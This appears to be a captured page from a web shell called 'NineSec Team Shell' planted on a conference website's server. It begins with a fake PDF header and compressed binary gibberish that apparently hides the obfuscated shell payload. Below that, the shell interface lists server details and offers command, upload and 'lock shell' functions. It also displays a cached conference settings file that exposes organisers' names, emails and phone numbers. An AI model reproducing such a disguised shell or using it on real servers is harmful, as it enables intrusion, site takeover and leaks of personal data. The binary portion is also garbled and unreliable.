%PDF-1.3 %âãÏÓ 1 0 obj<> endobj 2 0 obj<> endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream xœ¥\mo7þ ÿa?îâñH£ÑÌàŠyi{¹$EÚ(i?¬cÇÞÄkûürAþý‰½Žv·EÛízF¢HI|H‘Ô?¿{Ø|Z|X|÷Ýñó‡‡õÇËó³Å‡ã77Û?O¾Ýž¿__l®×››ëãßOàя77çwß¿xñêåâÅÉÓ'Ç?ªÅ°8ùôôI] µûgQ»ÔB©¦2zaà³]œlÝûÅ|üôôɇåÛ՟‹“?}òƒ£ " L* & J * j .  N (8HXhx )9IYiy *:JZjz +;K[k{ , C> r. ^ ~ N @ qO!  ` ( S A  a=  ! wQ It Ba @l q T  f !U* A 9%n o M - 5J  w@O|l:Bg y= B=jq K - jM 4EP N q f ^ u> $k ( H l EW o W  %l d] 6 ] - L  > 9 t* y 4 b 5 Q\ \ v U  2c 3  c qM = |  IT: S |{; ^| e]/ n3g _ > t! y {  Zm \{o]'S ~ VN a w - u x* " 3 }$jH q w bx B" < 5b }% + 09_h>G u7$ y MJ$ Y&X z (r ` [N _pny!lu o x `N d z Oy O.* r  _s iQ  BRx .) _6jV ] # W RVy k~ cI Y H  dsR  rZ+ )f d v* ' i G j * cB zi  _  j z[ 7; 2 -  zZ  f V z9 JR n  72 81 [e n &ci ( r  U q _+q rV 3  " > ;1 0x >{ |` r h W q f 3 l ]u b-5 Fwm z zp)M ) jO q u q  E K l 7  [[ y Xg e ~ , 9  k; +ny  )s=9) u_l " Z ; x =. M= +? ^  q $ .[ i [ Fj y Ux { >_ xH  > ; 8 < w/l hy  9o <: 'f4 |   w e  G G * !# b` B,  $*q Ll   (Jq T r ,jq \   0 q d,  4 q ll   8 q t  < q |   @ r , ! D*r l # HJr %/ Ljr '? P r , ) Q; gzuncompress NineSec Team Shell
NineSec Team Shell
Server IP : 192.168.60.199  /  Your IP : 192.168.60.1
Web Server : Apache
System : Linux PROD-conference 6.8.12-17-pve #1 SMP PREEMPT_DYNAMIC PMX 6.8.12-17 (2025-11-21T11:16Z) x86_64
User : www-data ( 33)
PHP Version : 5.6.40-0+deb8u12
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /var/lib/../www/html/cache/

[  Home  ][  C0mmand  ][  Upload File  ][  Lock Shell  ][  Logout  ]

Current File : /var/lib/../www/html/cache/fc-schedConfSettings-123.php
<?php return array (
  'boardEnabled' => false,
  'emailSignature' => 
  array (
    'en_US' => '________________________________________________________________________
International Conference on Strategic and Global Studies (ICSGS) 2019
http://icsgs.sksg.ui.ac.id',
  ),
  'contactAffiliation' => 
  array (
    'en_US' => 'Universitas Indonesia',
  ),
  'overview' => 
  array (
    'en_US' => '<ul><li><span>Security</span></li></ul><p>The current security problem is very diverse. Its aspect is not only in preventing the occurrence of conventional crime, but also in terms of security in the broadest sense. Strengthening border security, investment security, food security, social security, etc.</p><p>Crime Security, Cyber Security, Financial Security, Investment Security, Border Security, Food Security, Smart City Security</p><ul><li><span>Technology</span></li></ul><p>At present, technological development is a crucial issue for human life. Human dependence on technology is in a very high phase. Political, economic, social, and cultural issues cannot be separated from technology. Technology becomes a supporting tool (even primary), for example in political and economic processes.</p><p>Finance and Technology, Politics and Technology, Social and Cultural Change and Technology, Security and Technology, Crime Mode and Technology, Cyber Intelligence</p><ul><li><span>Economic</span></li></ul><p>Economic development and growth will have an impact on security. The technological mastery gap will slow economic growth. Conventional economic activities have been abandoned, because of the growth and development of e-commerce that has a close relationship with the mastery of technology.</p><p>E-Commerce and Economic Development, Tourism and Security, Social Security, Technology and Socio-Economic Impact.</p><ul><li><span>Culture</span></li></ul><p>Globalization and modernization, which are taking place in the world, certainly have an impact on culture. Implications for cultural development will have implications for cultural change. If the implications occur massively, the state will experience cultural vulnerability.</p><p>Modernization and Cultural Impact, Technology and Culture, Promoting Cultural Value Using Technology</p><ul><li><span>Terrorism &amp; Extremism</span></li></ul><p>The movement of terrorism and extremism is still a threat to world security and Indonesia. The motives for terrorism also vary. Religious and ideological reasons are two things that often arise. Changes in the pattern of terrorist attacks by involving children and women are a phenomenon that is happening in the world today. Along with technological developments that have implications for the media, the terrorism movement uses the instrument to carry out acts of terror and violence.</p><p>Women and Children Involvement, Industry, radicalism and terrorism, big data and terrorism, social media and extremism, preventing and countering violent extremism, empowering ex-combatants.</p><ul><li><span>National Resilient: Youth leadership space in national defence</span></li></ul><p>Discussing Post Technology Era, it is necessary to examine the subjects exposed to this phenomenon. Not only as a subject but also an object, the youth group is an agent of change towards the dynamics that emerged in this era. Youth groups become the foundation of change towards sustainable development.</p><p>The youth group will mainstream the technological approach not only as a tool, but to integrate it with the target results achieved. Technology makes a new space for youth groups in contesting to strengthen social security. Youth groups can also sharpen their leadership through technology.</p><p>Based on the UNDP study (Clemente, 2018) regarding the fulfillment of SDGs, youth leadership has an important role in accelerating the process of becoming digital society. Among them through: 1) Green Thinking; have zero waste mindset in activities that are in harmony with the healthy environment, 2) Enterprising solutions; presenting inclusive and sustainable solutions for economic growth, 3) Preventing Violence; prevention of violence in the space of youth competition 4) Robot-assisted participation; integration with the development of robot technology as an assistant to human activities, 5) Multi dimensional thinking; holistic approach to problem solving. These five things are taken into consideration by youth groups in generating national resilience through the existence of technology.</p>',
  ),
  'introduction' => 
  array (
    'en_US' => '<div class="fusion-reading-box-container reading-box-container-1"><div class="reading-box"><h2>Security Strategy and National Resilience in Post Human Era</h2><div class="reading-box-additional fusion-reading-box-additional"><p>Technological advances have had a positive impact on human life. The industrial revolution has brought people to an era with extraordinary technological achievements. In addition, many conveniences are achieved for various activities. In short, technology is inevitable for the advancement of human civilization.</p><p>Even though technology is a supporting instrument for human civilization, ultimately humans have an important role to play. Technology design, both its appearance and importance, will be based on humans. It is human beings who create technology, operate technology, and eventually humans will determine whether the technology is still feasible or not.</p><p>At present, security is an important issue for the world. Security is a prerequisite for economic growth, development, culture, and political activity, both on a national, regional, and international scale. Political and economic activities will be hampered due to problems of security stability.</p><p>The stability of a country is no longer determined by how the level of crime is reduced. The country can be said to be stable if it has succeeded in meeting the food needs of its population. Unavailability or high prices of food will have an impact on people’s purchasing power, hence it will cause social turmoil. Likewise with the energy, a country’s productivity is hampered in the event of a scarcity of energy due to the state’s inability to diversify energy for the community.</p><p>Security issues are not only based on security aspects which are only approved by the classics, but security issues are also related to other sectors, such as food security, energy, agricultural security, and economic security. Not to mention, security issues are also faced with the problem of the modus operandi that continues to develop along with technological advances.</p><p>The issue of terrorism for example, has experienced various shifts due to the existence of technology. Recruitment and dissemination of extreme narratives no longer use conventional methods alone. Today, extreme narratives have been carried out with the help of social media and internet platforms.</p></div></div></div>',
  ),
  'submissionChecklist' => 
  array (
    'en_US' => 
    array (
      0 => 
      array (
        'order' => '1',
        'content' => 'The submission has not been previously published, nor is it before another conference for consideration (or an explanation has been provided in Comments to the Director).',
      ),
      1 => 
      array (
        'order' => '2',
        'content' => 'The submission file is in OpenOffice, Microsoft Word, RTF, or WordPerfect document file format.',
      ),
      2 => 
      array (
        'order' => '4',
        'content' => 'The text is single-spaced; uses a 12-point font; employs italics, rather than underlining (except with URL addresses); and all illustrations, figures, and tables are placed within the text at the appropriate points, rather than at the end.',
      ),
      3 => 
      array (
        'order' => '5',
        'content' => 'The text adheres to the stylistic and bibliographic requirements outlined in the <a href="/icsgs/icsgs2019/about/submissions#authorGuidelines">Author Guidelines</a>, which is found in About the Conference.',
      ),
      4 => 
      array (
        'order' => '6',
        'content' => 'If submitting to a peer-reviewed track of the conference, authors\' names are removed from submission, with "Author" and year used in the bibliography and footnotes, instead of authors\' name, paper title, etc.',
      ),
      5 => 
      array (
        'order' => '7',
        'content' => 'If submitting to peer review, all Microsoft Office documents (including Supplementary Files) have been saved by going to File and selecting Save As; clicking Tools (or Options in a Mac); clicking Security; selecting "Remove personal information from file properties on save"; clicking Save.',
      ),
    ),
  ),
  'authorGuidelines' => 
  array (
    'en_US' => '<p><span>Language:</span></p><p>The paper should use only one spelling, either British or American English.</p><p><span>Paper Format:</span></p><ul><li>Should be in Microsoft Word file (.doc or .docx)</li><li>Full paper is 7000 – 8000 words including references and abstract</li><li>Written in single space</li><li>All pages are in 1-inch margins in all sides (or 2.54 cm)</li><li>No page numbers are required in this submitted paper</li><li>Citation and references using Chicago 16<sup>th</sup> ed or APA 6h ed.</li></ul><p>The following section is paper structure required in this submission.</p><p><span>Title:</span></p><p>Paper title should be written in center Times New Roman size 16, with title no longer than three lines with the format below.</p><p>TITLE OF PAPER WRITTEN IN CAPITAL TIMES NEW ROMAN WITH FONT SIZE 16 AND CENTERED WITH MAXIMUM LENGTH THREE LINES OF TEXT</p><p><span>Author’s Name:</span></p><p>Should follow this format:</p><p><span>Author 1 (in bold, size: 12, Family Name at the end)</span></p><p>Name of University/Organisation,</p><p>City, Country</p><p><span>Author 2 (in bold, size: 12)</span></p><p>Name of University/Organisation, (if same as above, both names could be written on the line separated by a comma)</p><p>City, Country</p><p><span>Author 3 (in bold, size: 12)</span></p><p>Name of University/Organisation,</p><p>City, Country</p><p><span>Abstract:</span></p><p>Abstract should be in maximum 200 words, written in single paragraph, Times New Roman size 10.  Single space. Avoid quotation and citing references in abstract. Abstract is written in justify.</p><p>Keywords: maximum 4 keywords, written in Times New Roman size 10.</p><p><span>Introduction</span></p><p>Beginning of the paper’s body. Mind the misspelling and double check every citation and quotation. From introduction to conclusion, write in Single Spaced, Justified, sized 12 Times New Roman.  Write without columns and keep one-inch margin in all sides of all pages.</p><p><span> </span></p><p><span>Methods (or synonym)</span></p><p>Each table and figure (including images) has caption. All tables must have captions written above the table with Times New Roman size 10, numbered consequently.</p><p>Figures must have captions written below the figure or image with Times New Roman size 10, numbered consequently. It is allowed to add description below figures/images or a notice to reader of where to focus. Images in paper should have the size less than 350kb, resolution 200dpi, with jpeg format.</p><p><span> </span></p><p><span>Results (or synonym)</span></p><p><span> </span></p><p><span>Discussion (or synonym)</span></p><p><span> </span></p><p><span> </span></p><p><span>Conclusion (or synonym)</span></p><p>Conclusion in this paper consists of 150-300 words</p><p><span>Acknowledgement</span></p><p>If needed.</p><p><span>References</span></p><p>With APA 6<sup>th</sup> ed.</p>',
  ),
  'copySubmissionAckAddress' => '',
  'copySubmissionAckSpecified' => false,
  'copySubmissionAckPrimaryContact' => true,
  'postAccommodation' => false,
  'postPresentations' => false,
  'postProgram' => false,
  'postCFP' => false,
  'postTimeline' => true,
  'previewAbstracts' => false,
  'reviewMode' => 1,
  'postTrackPolicies' => false,
  'notifyAllAuthorsOnDecision' => true,
  'numWeeksPerReviewAbsolute' => 1570381200,
  'numWeeksPerReviewRelative' => 0,
  'numDaysBeforeSubmitReminder' => 0,
  'numDaysBeforeInviteReminder' => 0,
  'reviewerAccessKeysEnabled' => 1,
  'restrictReviewerFileAccess' => 1,
  'rateReviewerOnQuality' => 1,
  'remindForSubmit' => 0,
  'remindForInvite' => 0,
  'postProposalSubmission' => true,
  'enablePublicSuppFileId' => true,
  'enablePublicPaperId' => true,
  'metaCitations' => true,
  'metaType' => false,
  'metaCoverage' => false,
  'metaSubject' => false,
  'metaSubjectClassUrl' => 'http://',
  'metaSubjectClass' => false,
  'metaDiscipline' => false,
  'acceptSupplementaryReviewMaterials' => false,
  'contributors' => 
  array (
  ),
  'sponsors' => 
  array (
  ),
  'envelopeSender' => '',
  'supportPhone' => '+62-821-3235-1117',
  'supportEmail' => 'syauqi_oki@yahoo.com',
  'supportName' => 'Muhamad Syauqillah',
  'contactMailingAddress' => 'rofii_daun@yahoo.com',
  'contactFax' => '',
  'contactPhone' => '+6281383801332',
  'contactEmail' => 'rofii_daun@yahoo.com',
  'contactTitle' => 'Dr.',
  'contactName' => 'Muhammad Sya’roni Rofii',
  'locationCountry' => 'ID',
  'locationCity' => 'Jakarta',
  'locationAddress' => '<h4>info@saripacificjakarta.com</h4>',
  'locationName' => 'SARI PACIFIC JAKARTA',
  'closeCommentsDate' => 1590080399,
  'delayOpenAccessDate' => 1589994000,
  'postPapersDate' => 1589994000,
  'postScheduleDate' => 1589994000,
  'postAbstractsDate' => 1589994000,
  'regReviewerCloseDate' => 1603817999,
  'regReviewerOpenDate' => 1586451600,
  'submissionsCloseDate' => 1604077199,
  'submissionsOpenDate' => 1590771600,
  'showCFPDate' => 1590512400,
  'regAuthorCloseDate' => 1604077199,
  'regAuthorOpenDate' => 1590512400,
  'endDate' => 1604682000,
  'startDate' => 1604595600,
  'postPayment' => true,
  'postSupporters' => false,
  'postOverview' => false,
  'acronym' => 
  array (
    'en_US' => 'icsgs2019',
  ),
  'title' => 
  array (
    'en_US' => 'International Conference on Strategic and Global Studies 2019',
  ),
  'paymentMethodPluginName' => 'ManualPayment',
  'reviewDeadlineType' => 2,
  'numWeeksPerReview' => 4,
); ?>

NineSec Team - 2022